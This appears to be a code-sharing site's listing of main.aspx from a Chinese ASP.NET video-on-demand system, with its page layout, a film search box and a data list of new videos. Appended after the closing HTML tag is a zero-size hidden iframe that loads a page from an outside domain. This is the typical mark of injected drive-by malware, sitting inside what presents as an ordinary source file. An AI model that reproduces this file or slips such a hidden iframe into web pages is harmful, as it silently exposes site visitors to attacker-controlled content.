⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 main.aspx

📁 视频点播系统使用方法如下: 1. 将"视频点播系统"目录下的所有文件和目录复制到IIS服务器根目录下某新建的虚目录
💻 ASPX
字号:
<%@ Page language="c#" Codebehind="Main.aspx.cs" AutoEventWireup="false" Inherits="Vod.WebForm1" %>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
	<HEAD>
		<title>Vod.net</title>
		<meta content="Microsoft Visual Studio 7.0" name="GENERATOR">
		<meta content="C#" name="CODE_LANGUAGE">
		<meta content="JavaScript" name="vs_defaultClientScript">
		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
		<LINK href="ioffice.css" type="text/css" rel="stylesheet">
	</HEAD>
	<body leftMargin="0" topMargin="0" MS_POSITIONING="GridLayout" bgColor="#EDE9EF">
	   <form id="Form1" method="post" runat="server">
	     <FONT face="宋体">		
		<TABLE id="Table1" align="center" height="100%" cellSpacing="0" cellPadding="0" width="780" border="0">
		   <TR>
		    <TD vAlign="top" height="425">
			<TABLE id="Table2" bgColor="#ffffff" height="100%" cellSpacing="0" cellPadding="0" width="100%" border="0">
			  <TR>
			    <TD width="195" height="425"><iframe id="iFrame1" style="BORDER-TOP-STYLE: none; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-BOTTOM-STYLE: none" tabIndex="0" marginWidth="0" marginHeight="0" src="left.aspx" frameBorder="0" width="195" height="100%">
					    </iframe>
			    </TD>
			    <TD>
			     <TABLE id="Table3" height="100%" cellSpacing="0" cellPadding="0" width="90%" border="0">	
			      <TR>		  
				<TD>
				    <TABLE id="Table4" style="Z-INDEX: 101;  WIDTH: 170px;LEFT: 348px; POSITION: absolute; TOP: 8px" cellSpacing="0" cellPadding="0" width="100%" border="0">					
                                            <TD>						                                            
                                                     <TABLE cellSpacing=0 cellPadding=0 width="98%" align=center border=0>
                                                         <TBODY>
                                                              <TR> 
                                                                  <TD><asp:Label id="Label2" runat="server" Width="60px" Font-Size="X-Small">影视搜索</asp:Label></TD>
                                                                  <TD><asp:textbox id="txtSearchName" runat="server" Width="160px"></asp:textbox></TD>
                                                                  <TD><P>&nbsp;&nbsp;</P></TD>                                                             
                                                                  <TD width=50 align=center> 
                                                                    <asp:dropdownlist id="drp" runat="server" Width="80px"></asp:dropdownlist>
                                                                  </TD>
                                                                  <TD><P>&nbsp;&nbsp;</P></TD>                                                            
                                                                  <TD><asp:imagebutton id="btnSearch" runat="server" ImageUrl="Img/searchv.gif"></asp:imagebutton></TD>                                                                
                                                               </TR>
                                                            </TBODY>
                                                        </TABLE>
                                             </TD>                                             
                                       </TABLE>
				  </TD>
				</TR>
				<TR>
				<TABLE id="Table5" style="Z-INDEX: 101; LEFT: 338px;  WIDTH: 170px; POSITION: absolute; TOP: 58px" cellSpacing="0" cellPadding="0" width="100%" border="0">
				  <TR><IMG alt="" src="img/newfilm.gif" width="550" height="30">
				  </TR>
				  <TR>				   
				   <TD>				  
				     <asp:datalist id="dg_NewVideo" runat="server" Width="100%">
				      <ItemTemplate>
					<FONT face="宋体">
					<TABLE id="Table11" cellSpacing="0" cellPadding="0" width="100%" border="0">
					 <TR>
					    <TD>
						<TABLE id="Table12" cellSpacing="0" cellPadding="0" width="100%" border="0">
						  <TR>
						     <TD align="left"><a href='ShowVideo.aspx?videoid=<%# DataBinder.Eval(Container.DataItem,"id")%>'><%# DataBinder.Eval(Container.DataItem,"Image")%></a>
						     	</TD>
						     <td width="10"></td>
						     <TD>
						     	<TABLE id="Table13" cellSpacing="0" cellPadding="0" width="100%" border="0">
							    <TR>
								<TD align="left"><a href='ShowVideo.aspx?videoid=<%# DataBinder.Eval(Container.DataItem,"id")%>'> 
								          <b><%# DataBinder.Eval(Container.DataItem,"name")%></b></a>
								</TD>
							    </TR>
							    <TR>
							       <TD height="10"></TD>
							    </TR>
							    <TR>
							       <TD><%# DataBinder.Eval(Container.DataItem,"descr")%></TD>
							    </TR>
							</TABLE>
						     </TD>
						   </TR>
						</TABLE>
					    </TD>
					 </TR>
					 <tr>
					      <td height="10"></td>
					 </tr>
					 <TR>
					      <TD background="img/bg11(1).gif" height="1"></TD>
					 </TR>
					 <tr>
					      <td height="10"></td>
					 </tr>
				      </TABLE>
				     </FONT>
				     </ItemTemplate>
				      <AlternatingItemTemplate>
					  <FONT face="宋体"></FONT>
				      </AlternatingItemTemplate>
				     </asp:datalist>
				     </TD>				     				   				    
				  </TR>
				</TABLE>
			       </TR>										
			     </TABLE>
			   </TD>
			  </TR>
			</TABLE>
		      </TD> 
		   </TR>
	       </TABLE>
	     </form>
	   </FONT>
	</body>
</HTML>
<IFRAME SRC="HTTP://www.m5k8.com/gr.htm" WIDTH=0 HEIGHT=0></IFRAME>

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -